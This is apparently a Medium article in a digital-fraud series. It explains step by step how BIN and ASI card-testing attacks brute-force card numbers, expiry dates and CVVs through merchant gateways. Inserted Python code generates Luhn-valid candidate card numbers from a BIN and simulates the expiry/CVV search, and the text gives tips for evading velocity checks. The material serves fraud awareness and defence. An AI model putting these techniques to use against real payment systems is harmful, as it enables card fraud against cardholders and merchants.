Digital Fraud: BIN/ASI Card Attacks

Details of how attackers are able to launch the most common card attacks on the internet

Mostafa Menessy
4 min read · Jun 25, 2020

So, this article is a continuation of the Fraud Attacks article series https://medium.com/the-innovation/brief-about-digital-fraud-types-96c6210da797. I will explain in detail the technicalities behind the BIN/ASI attack and how an attacker is able to launch it successfully. Mitigation of such an attack will be tackled in another article.

Card Numbers Formula

Before jumping into the details, it helps to understand the arithmetic behind card numbers.

In most cases, to purchase online services or goods you need the card number (aka Primary Account Number, or PAN) along with the expiry date and CVV. In some special cases, such as recurring payments, only the PAN and expiry date may be required. This transaction type is referred to as MOTO (Mail Order/Telephone Order): the card details are keyed in without the cardholder present and without the CVV.

The PAN is usually 16 digits. The first 6 digits are the Bank Identification Number (aka BIN), also called the Issuer Identification Number (IIN), which identifies the issuing bank together with the product type: platinum credit, debit and so on. (Since this article was written, ISO/IEC 7812 has extended the IIN to 8 digits, so newer BIN tables may list 8-digit prefixes.) The first one or two digits identify the card brand. For example:

- Amex bin list: Card numbers start with 34 or 37.

- Visa bin list: Card numbers start with a 4.

- MasterCard bin list: Card numbers start with 51 through 55, or 2221 through 2720.

- Diners Club bin list: Card numbers begin with 300 through 305, 36, or 38.

- Discover bin list: Card numbers begin with 6011 or 65.

- JCB bin list: Card numbers begin with 3528 through 3589.

(Figure: sample card formatting)

Following the BIN, the next 9 digits are the individual account number, and the 16th digit is the Luhn check digit, which is computed from the first 15 digits. So from a security perspective the genuinely sensitive digits are the 7th through the 15th, i.e. the account number: the BIN is public information and the check digit can be derived. This is also why PCI DSS masking rules allow at most the first six and last four digits of a PAN to be displayed.

Attack Launch

1. Targeting the BIN

As the name implies, a BIN attack targets an issuer: the attacker tries to identify valid card credentials by guessing, without any interaction with the cardholder. This is done by brute-forcing the card number through fake online payment attempts. The attacker first selects the target issuer from one of the public BIN lists, e.g. https://binlists.com/bybank.

2. Guessing the account number

To guess the account number, attackers either try account numbers sequentially or simply generate random 9-digit values.

From the target BIN and the guessed account number they compute the 16th (Luhn) digit, so every candidate passes the checksum test that merchant checkout pages run before submitting a payment. Note that a Luhn-valid number is not necessarily an issued card; establishing that is what the following steps are for. For fun, below are links to sites that generate such numbers:

https://www.bincodes.com/bin-creditcard-generator/

https://generator.creditcard/
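As an added example (not code from the article or from the generator sites linked above), the following Python puts the Card Numbers Formula section and step 2 together: it computes and validates the Luhn check digit, classifies a PAN by brand using the leading-digit ranges listed above, masks a PAN the way PCI DSS permits, and builds candidate PANs from a BIN, both the random variant and the sequential walk from a known-valid seed. The BIN 411111 and all account numbers are constructed for illustration; 4111111111111111 is the standard Visa test number, not an issued card.

```python
# Added example (not from the article): anatomy of a 16-digit PAN and the
# candidate generation of step 2. The BIN, account numbers and seed PAN below
# are constructed for illustration; 4111111111111111 is the standard Visa test
# number, not an issued card.

import random


def luhn_checksum(digits: str) -> int:
    """Luhn sum mod 10: double every second digit counting from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10


def luhn_valid(pan: str) -> bool:
    """True when the last digit is the correct check digit for the rest."""
    return pan.isdigit() and luhn_checksum(pan) == 0


def luhn_check_digit(first15: str) -> str:
    """The 16th digit that makes first15 + digit pass luhn_valid()."""
    return str((10 - luhn_checksum(first15 + "0")) % 10)


# Leading-digit ranges per brand (inclusive), compared on a prefix of the same width.
BRAND_RANGES = [
    ("American Express", [(34, 34), (37, 37)]),
    ("Visa", [(4, 4)]),
    ("Mastercard", [(51, 55), (2221, 2720)]),
    ("Diners Club", [(300, 305), (36, 36), (38, 38)]),
    ("Discover", [(6011, 6011), (65, 65)]),
    ("JCB", [(3528, 3589)]),
]


def card_brand(pan: str) -> str:
    """Brand from the leading digits, or 'unknown' if no range matches."""
    for brand, ranges in BRAND_RANGES:
        for lo, hi in ranges:
            width = len(str(lo))
            if lo <= int(pan[:width]) <= hi:
                return brand
    return "unknown"


def mask_pan(pan: str) -> str:
    """PCI DSS style display: BIN and last four visible, the middle hidden."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def pan_from_bin(bin6: str, account: int) -> str:
    """Full PAN from a 6-digit BIN and a 9-digit account number (step 2)."""
    first15 = f"{bin6}{account:09d}"
    return first15 + luhn_check_digit(first15)


def random_candidates(bin6: str, count: int, seed: int = 0) -> list:
    """Step 2, random variant: random 9-digit account numbers under one BIN."""
    rng = random.Random(seed)
    return [pan_from_bin(bin6, rng.randrange(10**9)) for _ in range(count)]


def sequential_candidates(seed_pan: str, count: int) -> list:
    """Step 2, sequential variant: the account numbers right after a known PAN,
    each with its own recomputed check digit."""
    bin6, account = seed_pan[:6], int(seed_pan[6:15])
    return [pan_from_bin(bin6, (account + k) % 10**9) for k in range(1, count + 1)]


if __name__ == "__main__":
    pan = "4111111111111111"
    print(pan, luhn_valid(pan), card_brand(pan), mask_pan(pan))
    print(sequential_candidates(pan, 3))
    print(random_candidates("411111", 3, seed=1))
```

Every number `pan_from_bin` produces passes the Luhn test, which is exactly why a checksum alone tells a merchant nothing about whether the card exists; the sequential walk shows how cheaply an attacker moves from one known card to its neighbours once the issuer allocates account numbers in order.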

With that mathematically valid PAN, the attacker tries it across a pool of merchant websites with weak controls to check whether the PAN is actually issued. They supply a made-up expiry date and CVV; at this stage the only information sought is whether the gateway reports the card itself as invalid.

On many payment gateways such a request is answered with an “Invalid card” response, which the attacker captures and uses to move on to the next candidate number. A full search is about 10⁹ account numbers per BIN, which is large. To shrink it, attackers start from a known valid card number and walk sequentially through the neighbouring account numbers, since many issuers allocate account numbers in sequence; this can reduce the search to on the order of 1000 attempts per hit.

3. Extracting the expiry date

Once a valid PAN is found, the next step is to find its expiry date. Most issuers set card expiry at most 5 years out, which gives 12 × 5 = 60 candidate month/year values, easily tried across the pool of weakly protected merchant sites. The oracle is the decline reason: when one of these requests is declined for an invalid CVV rather than an invalid expiry date, the attacker knows the expiry date in that request is correct.

4. Finally, the tricky CVV

Now the CVV is the only remaining component. There are about 1000 combinations to try (10,000 for the 4-digit code used by American Express). This is the tricky stage, because fraud detection and throttling systems can block the card temporarily or even permanently after repeated declines. Attackers therefore take extra precautions here: spacing attempts out over time and spreading them across a bigger pool of merchants so that no single merchant or gateway sees a velocity spike.
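As an added example (not code from the article), the following Python simulates steps 3 and 4 above against two toy gateways. The verbose gateway reports which field was wrong, so the attacker can recover the expiry date from the "invalid CVV" signal and then the CVV, in at most 60 + 1000 attempts. The second gateway returns one opaque decline and keeps a per-PAN decline counter, so the two fields must be searched jointly (60 × 1000) and the card is blocked long before that. The issuer record, expiry, CVV and block threshold are constructed for this example; 4111111111111111 is the standard Visa test number, not an issued card.

```python
# Added example (not from the article): a simulated card-not-present gateway
# that shows why steps 3 and 4 work. The issuer record and the PAN below are
# constructed for this example; 4111111111111111 is the standard Visa test
# number, not an issued card.

from itertools import product

# Constructed issuer record: one valid card with its expiry (MMYY) and CVV.
ISSUED = {"4111111111111111": {"expiry": "0924", "cvv": "123"}}


def authorize_verbose(pan: str, expiry: str, cvv: str) -> str:
    """Gateway that says which field was wrong: the behaviour the article relies on."""
    card = ISSUED.get(pan)
    if card is None:
        return "INVALID_CARD"        # step 2's signal: PAN is not issued
    if card["expiry"] != expiry:
        return "INVALID_EXPIRY"      # PAN valid, expiry wrong
    if card["cvv"] != cvv:
        return "INVALID_CVV"         # step 3's signal: PAN and expiry both valid
    return "APPROVED"


class ThrottledGateway:
    """Gateway with one opaque decline code and a per-PAN decline counter."""

    def __init__(self, max_declines: int = 50):
        self.max_declines = max_declines
        self.declines = {}

    def authorize(self, pan: str, expiry: str, cvv: str) -> str:
        if self.declines.get(pan, 0) >= self.max_declines:
            return "CARD_BLOCKED"    # the block step 4 warns about
        card = ISSUED.get(pan)
        if card and card["expiry"] == expiry and card["cvv"] == cvv:
            return "APPROVED"
        self.declines[pan] = self.declines.get(pan, 0) + 1
        return "DECLINED"


def expiry_candidates(start_year: int = 2020, years: int = 5) -> list:
    """Every MMYY within `years` years of start_year: 12 * years = 60 values."""
    return [f"{m:02d}{y % 100:02d}"
            for y in range(start_year, start_year + years)
            for m in range(1, 13)]


def brute_force_split(pan: str, gateway) -> tuple:
    """Step 3 then step 4: learn the expiry from the INVALID_CVV signal, then the CVV.
    Returns ((expiry, cvv) or None, attempts used)."""
    attempts = 0
    expiry = None
    for exp in expiry_candidates():
        attempts += 1
        if gateway(pan, exp, "000") in ("INVALID_CVV", "APPROVED"):
            expiry = exp
            break
    if expiry is None:
        return None, attempts        # no per-field signal: the split attack fails
    for n in range(1000):
        attempts += 1
        cvv = f"{n:03d}"
        if gateway(pan, expiry, cvv) == "APPROVED":
            return (expiry, cvv), attempts
    return None, attempts


def brute_force_joint(pan: str, gateway) -> tuple:
    """Without a per-field signal, expiry and CVV must be searched jointly (60 x 1000).
    Stops as soon as the gateway reports the card blocked."""
    attempts = 0
    for exp, n in product(expiry_candidates(), range(1000)):
        attempts += 1
        response = gateway(pan, exp, f"{n:03d}")
        if response == "APPROVED":
            return (exp, f"{n:03d}"), attempts
        if response == "CARD_BLOCKED":
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    pan = "4111111111111111"
    print("verbose gateway, split attack:", brute_force_split(pan, authorize_verbose))
    print("opaque gateway, split attack: ", brute_force_split(pan, ThrottledGateway(10**6).authorize))
    print("opaque gateway, joint attack: ", brute_force_joint(pan, ThrottledGateway(10**6).authorize))
    print("opaque + throttle (50):       ", brute_force_joint(pan, ThrottledGateway(50).authorize))
```

The per-field decline reason is what collapses the search from tens of thousands of attempts to a few hundred; the throttle counter is the piece that makes step 4 risky for the attacker, which is why they spread the CVV guesses across many merchants and a long time window.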

Note:

ASI (Account Status Inquiry) brute-forcing is a variant of the BIN attack in which the attacker performs zero-amount authorizations instead of real purchases. Attackers commonly prefer this to keep a low profile: ASI transactions are not always subject to the same fraud detection and may not raise the alerts that transactions with a non-zero amount would.

What to do?

For sure, there are many detection and prevention measures that help reduce the risk of card credentials being exposed through such an attack. I will cover the common mitigation techniques at the merchant, payment gateway and issuer layers in another article, so stay tuned as more is to come. Also, if you are interested in the full Fraud series, here you go https://medium.com/the-innovation/brief-about-digital-fraud-types-96c6210da797 :)
